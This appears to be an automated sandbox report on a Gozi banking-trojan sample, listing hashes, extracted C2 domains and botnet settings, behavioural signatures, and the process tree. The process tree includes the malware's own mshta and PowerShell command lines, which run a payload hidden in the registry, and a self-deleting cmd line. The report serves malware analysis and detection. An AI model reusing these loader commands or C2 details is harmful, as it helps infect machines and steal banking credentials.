Overview

overview

10

Static

static

3

9872c3c580...9a.exe

windows7-x64

10

9872c3c580...9a.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 08:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9872c3c580e8bd1a22cd4698e73e3f9a.exe

  • Size

    292KB

  • MD5

    9872c3c580e8bd1a22cd4698e73e3f9a

  • SHA1

    396576ffc8211cca1e4509e29f29e74883c626d2

  • SHA256

    122742e0a532636207c9bc6f0ae44e45c5bd1df87cb5a1aa475f7fbdb0cc521f

  • SHA512

    34d7cd28bd24988c41b05911fa210f52a3f53a9106ea06e9edbc5f27e8cfeae50fb22cc3c5fa796e9514752e3b0f4c7733cb8942ce9686774b2b7b7dac1bea9d

  • SSDEEP

    3072:zXTH4bYS/eQDmXepeDNbuSTTNG9AMY8q4LCvr4Uot:roYQeQEepeZTNG+MTasUo

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

systemcheck.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3732
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:1884
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3964
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3156
        • C:\Users\Admin\AppData\Local\Temp\9872c3c580e8bd1a22cd4698e73e3f9a.exe
          "C:\Users\Admin\AppData\Local\Temp\9872c3c580e8bd1a22cd4698e73e3f9a.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2992
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 472
            3⤵
            • Program crash
            PID:1384
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eo2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eo2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name qerker -value gp; new-alias -name esllwy -value iex; esllwy ([System.Text.Encoding]::ASCII.GetString((qerker "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4068
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\etdkvfcc\etdkvfcc.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:416
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0BB.tmp" "c:\Users\Admin\AppData\Local\Temp\etdkvfcc\CSC5700BADABF214214B08C7B6D5DB9CCB9.TMP"
                5⤵
                  PID:4960
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jm4ym2yx\jm4ym2yx.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2864
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE1D4.tmp" "c:\Users\Admin\AppData\Local\Temp\jm4ym2yx\CSCD07C7CBD8E844DAA93DD26337B7BD2B5.TMP"
                  5⤵
                    PID:1852
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\9872c3c580e8bd1a22cd4698e73e3f9a.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:5084
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:5076
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:380
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:2984
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2992 -ip 2992
              1⤵
                PID:5108

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\RESE0BB.tmp
                Filesize

                1KB

                MD5

                2ced1145ce0c1ed2a49188a0bf2a1a7d

                SHA1

                49fc52d15a23135162ae9933ffc74a82494f0988

                SHA256

                01dec4b1a2ae54c9c13b11e60f89a4801b6070dac5ea4b5b434a7526bbda35b2

                SHA512

                a70671b00258da6f5d9560a7dbbf6c4811665826bafd0915ec2c859b09f2afba9bcdd7dcf148e0353bb9c834a5e0c9be21b6eb01535758a9c42d6bf1218c25e2

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RESE1D4.tmp
                Filesize

                1KB

                MD5

                9d57290d92212f2b9d22e86bd2e83713

                SHA1

                4a685d528466f0a026125c4c65b3f3961d095c40

                SHA256

                dc7bf5ff5939170f08b3633daf9238f0eaa6fb6dc4a3917a0a7154e4d9f6e5da

                SHA512

                89a3d8a291cdae63605a9fd2b514a4c9e58e01276198f75e081fb6746b049d25d818c41e4ce48143c0cbfb10b4683dfca180454328f43143cda4af78701c2a79

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dsldsdqv.dyi.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\etdkvfcc\etdkvfcc.dll
                Filesize

                3KB

                MD5

                8220644886fa988622bde9a780a5eaa2

                SHA1

                7b1d1791e216085b902a9bc59f30fb3afbcda594

                SHA256

                74c3a20b45b27564d0d645f90e90a2efec124b4dca6f3505365b5e8aea5c5934

                SHA512

                9d34b2dbcbba6a755152d956fdc946fabc9fafb380510a9cd8437cde349058c02ad42e732321b960d550fb8b95168cb898dbfaf387b315ae37ace216e1674a0b

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\jm4ym2yx\jm4ym2yx.dll
                Filesize

                3KB

                MD5

                c743094d8adb06bfc6db63344a6afceb

                SHA1

                2979bbb4fee2f28c8be126791de38c0e831b7744

                SHA256

                b87e7d151077c5c9ab1292d4ecad15dc0022b1f0f582fc23a1a07281e24fcdc8

                SHA512

                7495e6556b1b8af725785c941f40e8a08b0195d1800e554b32a4746251531669ca3a864826ba793e2ee1f1e2d957b3c07b42f6b89f5ba78ba9cfe54f09ca73e7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\etdkvfcc\CSC5700BADABF214214B08C7B6D5DB9CCB9.TMP
                Filesize

                652B

                MD5

                b61356760ab5c035fcea2840642c071d

                SHA1

                c8e30c9569b3622ec323ff1583fed96a2049bfd8

                SHA256

                e18ac2f7043b8b44f44a2b38e63c1f6d03a9770fb90b4da503eff761e78c1651

                SHA512

                94d571c367ee92a10d591b9debb02052f51d82e9fb124f087a6115159e5509ce3a048f7e35b125799408b3fae74fea627aa6367e47db0076db38b2159631b095

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\etdkvfcc\etdkvfcc.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\etdkvfcc\etdkvfcc.cmdline
                Filesize

                369B

                MD5

                a6c36cd3b572159a09503636aba83297

                SHA1

                60c80a5f952c51d3a1cfed54e304930a7e8c988c

                SHA256

                34e9d373913df6e0e249108ece0346ad80a53febb2bf90bfc5f254f8b8af68e3

                SHA512

                c85593d2e107a8f319119d1027a1b7b2cc57bee5ef2f426f9590d0e698c98d75c91241f2585ed1528b592eaa1eed7083d79073aadec8a30b7e438ec250b11f78

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\jm4ym2yx\CSCD07C7CBD8E844DAA93DD26337B7BD2B5.TMP
                Filesize

                652B

                MD5

                e8ac7f8a989faaaa090c2d26c80a7e79

                SHA1

                7e32332644d18846137f78a9e106127ce57d5baa

                SHA256

                e7b09cdee7677adc538293ba2e915ec8ce69b5323cd4557c0f02ab5ee7f37a1f

                SHA512

                cfbd979d63733f00c03e431f3299ef531f82407dc64e77a75f86102f3c0c3c138f44f667780e736f001b60c4c5655de065ed9aac2f8201f84a2d49b8831bebc4

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\jm4ym2yx\jm4ym2yx.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\jm4ym2yx\jm4ym2yx.cmdline
                Filesize

                369B

                MD5

                6edd657c20baafc4bacaa0b08e1c483a

                SHA1

                1efd92f2fb08b7765fce708ffec8925e8b83336d

                SHA256

                0ce3aad020215f528450c33d39911ff4d698fa085862ebfde33bff6c0e78a61e

                SHA512

                0a4dccb8df59b5489075ef487e9f94bb792b47c69171a8dfa3cf7e8d63b340ce8f2b5ef08ff6a66a677c2abe1e5f3a38f51b34b9a94c371def93080a15b399ce

                Download Submit
              • memory/380-106-0x0000000000BF0000-0x0000000000BF1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/380-102-0x0000000000EE0000-0x0000000000F78000-memory.dmp
                Filesize

                608KB

                Download
              • memory/380-114-0x0000000000EE0000-0x0000000000F78000-memory.dmp
                Filesize

                608KB

                Download
              • memory/1884-117-0x000001A886010000-0x000001A8860B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1884-84-0x000001A8857B0000-0x000001A8857B1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1884-83-0x000001A886010000-0x000001A8860B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2984-90-0x000002779E320000-0x000002779E321000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2984-120-0x000002779E840000-0x000002779E8E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2984-89-0x000002779E840000-0x000002779E8E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2992-1-0x00000000024A0000-0x00000000025A0000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/2992-10-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/2992-7-0x0000000003FF0000-0x0000000003FFD000-memory.dmp
                Filesize

                52KB

                Download
              • memory/2992-6-0x0000000003FD0000-0x0000000003FDB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/2992-4-0x00000000024A0000-0x00000000025A0000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/2992-3-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/2992-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/3156-57-0x00000000089A0000-0x0000000008A44000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3156-97-0x00000000089A0000-0x0000000008A44000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3156-58-0x0000000002620000-0x0000000002621000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3732-71-0x0000017EA5100000-0x0000017EA51A4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3732-72-0x0000017EA4F80000-0x0000017EA4F81000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3732-103-0x0000017EA5100000-0x0000017EA51A4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3964-116-0x0000022BE7610000-0x0000022BE76B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3964-77-0x0000022BE7610000-0x0000022BE76B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3964-78-0x0000022BE6C50000-0x0000022BE6C51000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4068-24-0x00000208E8260000-0x00000208E8270000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4068-68-0x00007FFFD80A0000-0x00007FFFD8B61000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4068-53-0x00000208E86A0000-0x00000208E86A8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4068-18-0x00000208E8210000-0x00000208E8232000-memory.dmp
                Filesize

                136KB

                Download
              • memory/4068-23-0x00007FFFD80A0000-0x00007FFFD8B61000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4068-26-0x00000208E8260000-0x00000208E8270000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4068-55-0x00000208E86B0000-0x00000208E86ED000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4068-25-0x00000208E8260000-0x00000208E8270000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4068-69-0x00000208E86B0000-0x00000208E86ED000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4068-39-0x00000208E8250000-0x00000208E8258000-memory.dmp
                Filesize

                32KB

                Download
              • memory/5076-111-0x0000027DB0C10000-0x0000027DB0C11000-memory.dmp
                Filesize

                4KB

                Download
              • memory/5076-109-0x0000027DB0A60000-0x0000027DB0B04000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5076-118-0x0000027DB0A60000-0x0000027DB0B04000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5084-99-0x000002622CC90000-0x000002622CC91000-memory.dmp
                Filesize

                4KB

                Download
              • memory/5084-119-0x000002622CE10000-0x000002622CEB4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/5084-96-0x000002622CE10000-0x000002622CEB4000-memory.dmp
                Filesize

                656KB

                Download